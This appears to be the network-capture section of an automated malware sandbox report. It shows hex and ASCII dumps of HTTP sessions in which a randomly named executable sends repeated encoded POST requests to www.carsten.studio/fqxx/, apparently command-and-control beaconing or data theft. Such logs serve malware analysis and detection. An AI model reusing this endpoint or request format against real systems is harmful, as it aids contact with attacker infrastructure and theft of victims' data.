                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 62 36 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e
                                                                                                                                                                                Data Ascii: b61f<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.n
                                                                                                                                                                                Nov 29, 2024 09:18:31.437772989 CET109INData Raw: 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64
                                                                                                                                                                                Data Ascii: et"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprA
                                                                                                                                                                                Nov 29, 2024 09:18:31.437944889 CET1236INData Raw: 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77
                                                                                                                                                                                Data Ascii: ppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host
                                                                                                                                                                                Nov 29, 2024 09:18:31.438030958 CET1236INData Raw: 3d 22 22 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72
                                                                                                                                                                                Data Ascii: =""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+
                                                                                                                                                                                Nov 29, 2024 09:18:31.438044071 CET1236INData Raw: 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e
                                                                                                                                                                                Data Ascii: .toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9
                                                                                                                                                                                Nov 29, 2024 09:18:31.438169956 CET1236INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d
                                                                                                                                                                                Data Ascii: type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span
                                                                                                                                                                                Nov 29, 2024 09:18:31.438180923 CET1236INData Raw: 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64
                                                                                                                                                                                Data Ascii: window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex",
                                                                                                                                                                                Nov 29, 2024 09:18:31.438193083 CET1236INData Raw: 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29
                                                                                                                                                                                Data Ascii: e{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","u
                                                                                                                                                                                Nov 29, 2024 09:18:31.438205957 CET1236INData Raw: 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3b 74 72 79 7b 76 61 72 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61
                                                                                                                                                                                Data Ascii: sghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmp
                                                                                                                                                                                Nov 29, 2024 09:18:31.438291073 CET1236INData Raw: 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e
                                                                                                                                                                                Data Ascii: typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(ty
                                                                                                                                                                                Nov 29, 2024 09:18:31.557900906 CET1236INData Raw: 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 74 69 73 61 6c 69 6e
                                                                                                                                                                                Data Ascii: net/px.js?ch=1"></script><script type="text/javascript" src="http://www.cortisalincontrol.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                37192.168.2.450026217.160.0.200801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:37.625813007 CET778OUTPOST /fqxx/ HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 4a 53 73 61 38 70 46 36 31 37 4e 49 34 50 6a 49 6d 56 34 75 76 64 30 4a 76 32 6f 47 62 74 33 63 76 67 59 4f 71 51 63 31 49 74 2f 6b 32 42 54 67 46 65 7a 58 53 32 39 73 4d 6f 45 73 6c 57 70 4d 6c 6f 6a 59 72 66 59 36 4a 7a 67 4d 63 37 52 51 67 68 44 76 34 74 2b 39 7a 75 42 77 33 52 6b 41 57 39 6e 61 69 6a 4a 4f 74 75 4c 61 4f 59 70 41 71 45 33 72 71 74 34 55 54 74 4b 62 64 63 54 55 58 7a 30 39 54 7a 37 6f 35 6d 67 71 2f 72 74 32 34 31 72 72 70 51 44 58 2f 74 43 57 6d 7a 6d 75 73 46 79 61 43 66 56 30 57 79 2f 53 32 6b 65 33 39 33 38 4e 52 4a 4a 39 65 6f 67 31 6c 55 31 33 48 77 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=JSsa8pF617NI4PjImV4uvd0Jv2oGbt3cvgYOqQc1It/k2BTgFezXS29sMoEslWpMlojYrfY6JzgMc7RQghDv4t+9zuBw3RkAW9naijJOtuLaOYpAqE3rqt4UTtKbdcTUXz09Tz7o5mgq/rt241rrpQDX/tCWmzmusFyaCfV0Wy/S2ke3938NRJJ9eog1lU13Hw==
                                                                                                                                                                                Nov 29, 2024 09:18:38.930466890 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:38 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:18:38.930507898 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                38192.168.2.450027217.160.0.200801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:40.302102089 CET798OUTPOST /fqxx/ HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 4a 53 73 61 38 70 46 36 31 37 4e 49 2b 66 54 49 31 69 6b 75 6e 64 30 4b 78 6d 6f 47 52 4e 33 59 76 67 55 4f 71 55 4d 6c 49 65 62 6b 7a 52 6a 67 45 66 7a 58 52 32 39 73 55 59 45 6c 76 32 70 48 6c 6f 75 79 72 64 63 36 4a 7a 30 4d 63 36 68 51 68 51 44 6f 35 39 2b 2f 6f 2b 42 79 71 68 6b 41 57 39 6e 61 69 6a 63 72 74 75 6a 61 4f 70 35 41 71 68 4c 6f 70 74 34 56 65 39 4b 62 4d 73 54 51 58 7a 31 6f 54 78 66 53 35 6c 49 71 2f 76 70 32 34 6b 71 5a 6e 67 44 52 37 74 44 44 70 67 6a 2b 6c 48 6d 58 4c 4f 78 44 52 68 54 46 33 69 54 74 73 47 64 61 44 4a 74 4f 44 76 70 42 6f 58 49 2b 63 78 36 64 35 41 4e 4b 30 67 74 39 31 6a 33 76 53 41 39 55 32 79 77 3d
                                                                                                                                                                                Data Ascii: JZOtU=JSsa8pF617NI+fTI1ikund0KxmoGRN3YvgUOqUMlIebkzRjgEfzXR29sUYElv2pHlouyrdc6Jz0Mc6hQhQDo59+/o+ByqhkAW9naijcrtujaOp5AqhLopt4Ve9KbMsTQXz1oTxfS5lIq/vp24kqZngDR7tDDpgj+lHmXLOxDRhTF3iTtsGdaDJtODvpBoXI+cx6d5ANK0gt91j3vSA9U2yw=
                                                                                                                                                                                Nov 29, 2024 09:18:41.675199986 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:41 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:18:41.675252914 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                39192.168.2.450028217.160.0.200801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:18:42.969819069 CET10880OUTPOST /fqxx/ HTTP/1.1
                                                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 4a 53 73 61 38 70 46 36 31 37 4e 49 2b 66 54 49 31 69 6b 75 6e 64 30 4b 78 6d 6f 47 52 4e 33 59 76 67 55 4f 71 55 4d 6c 49 65 54 6b 7a 43 72 67 46 38 4c 58 51 32 39 73 64 34 45 67 76 32 70 61 6c 6f 32 32 72 64 42 48 4a 77 4d 4d 63 63 56 51 70 44 62 6f 32 39 2b 2f 33 75 42 2f 33 52 6b 5a 57 39 58 65 69 6a 4d 72 74 75 6a 61 4f 71 78 41 6f 30 33 6f 6d 4e 34 55 54 74 4b 2b 64 63 54 6f 58 7a 73 66 54 78 61 77 34 55 6f 71 38 4c 4e 32 2f 53 65 5a 68 77 44 54 2b 74 43 41 70 6e 71 6b 6c 48 37 6d 4c 4f 45 55 52 69 50 46 30 6d 2b 75 7a 6c 70 4d 58 6f 70 49 59 4e 46 2f 74 47 34 6a 53 7a 32 34 38 67 31 6c 75 31 4e 51 32 56 32 4c 48 43 45 4c 72 43 4b 36 61 6c 64 48 51 47 78 34 55 2f 64 36 37 6b 56 36 35 5a 39 73 72 6c 55 56 70 71 59 39 75 2f 43 41 44 75 54 36 6d 70 49 55 2f 55 6b 37 62 75 43 63 61 66 58 70 43 69 35 67 6c 55 34 49 41 4b 58 6e 6a 6f 70 74 72 58 59 43 6a 54 62 4a 63 76 75 67 4c 56 43 34 34 4c 6e 6e 44 39 4a 6d 41 72 33 69 46 45 2b 47 63 4e 38 61 48 42 4c 45 75 6c 61 55 61 46 46 65 [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=JSsa8pF617NI+fTI1ikund0KxmoGRN3YvgUOqUMlIeTkzCrgF8LXQ29sd4Egv2palo22rdBHJwMMccVQpDbo29+/3uB/3RkZW9XeijMrtujaOqxAo03omN4UTtK+dcToXzsfTxaw4Uoq8LN2/SeZhwDT+tCApnqklH7mLOEURiPF0m+uzlpMXopIYNF/tG4jSz248g1lu1NQ2V2LHCELrCK6aldHQGx4U/d67kV65Z9srlUVpqY9u/CADuT6mpIU/Uk7buCcafXpCi5glU4IAKXnjoptrXYCjTbJcvugLVC44LnnD9JmAr3iFE+GcN8aHBLEulaUaFFePh0Fs6KPvgnYI154/3eTYTtfyWnsdm96oyOIsIdbqrzoesDD57N+jpB9NqT9ZHVjlLyDskQgP3Kd4uMfaCXhyyNrp3N3AdFRkMU5dskcKBiQFpSPJDy8ZwWeg8wuzDepSss5PUKEQGzXSGi2qYGpywHg5KZumIhuI4+lLZF20BpCxQ1NStnBJLTo8Nwj4EARk1xgV/pnQrNul/6BXTRnVGDFC0Codj15z4K9bs3svRb7BSFE0fU+tGr702z71B1kANySxgwia9P+QqsXhqZ45tpP5lwbAHXdRNxb1l436BnHeKY0MSWdPG6qlVuj0sXqxc2iDDTSC97EhwiYATWljRSUV1Whks8RxSWPvU62HFrNppMRLvTym5mjC49ef4v4EmfTuSecqvu5bppjiR163i0EZyRR0P/Wiey0Sp+5yvsnxuDtnu9CcZ8YCtx5tdZ0BbiWh91vSbgNsgmtaDbUrfhrZcbQp/BLy9TY8IFx9Id2V+DkoGxwZt5V3193/LUpdqgSOTLCAR2zUuo66LZIjT4upjdz/2rJ80mRyYdkN7i+HVxgRdvKOy0FQO35QuXCBlRuIoCCpzO2wV21clJk9MgtSiHduIaiPbJfess6UiIskoAHAgf1AuvamNw6lcu59CcTZK0d9x1BdmBVX/jaKjNn1FJRY6fQYx [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:18:44.332782030 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:18:44 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:18:44.332804918 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
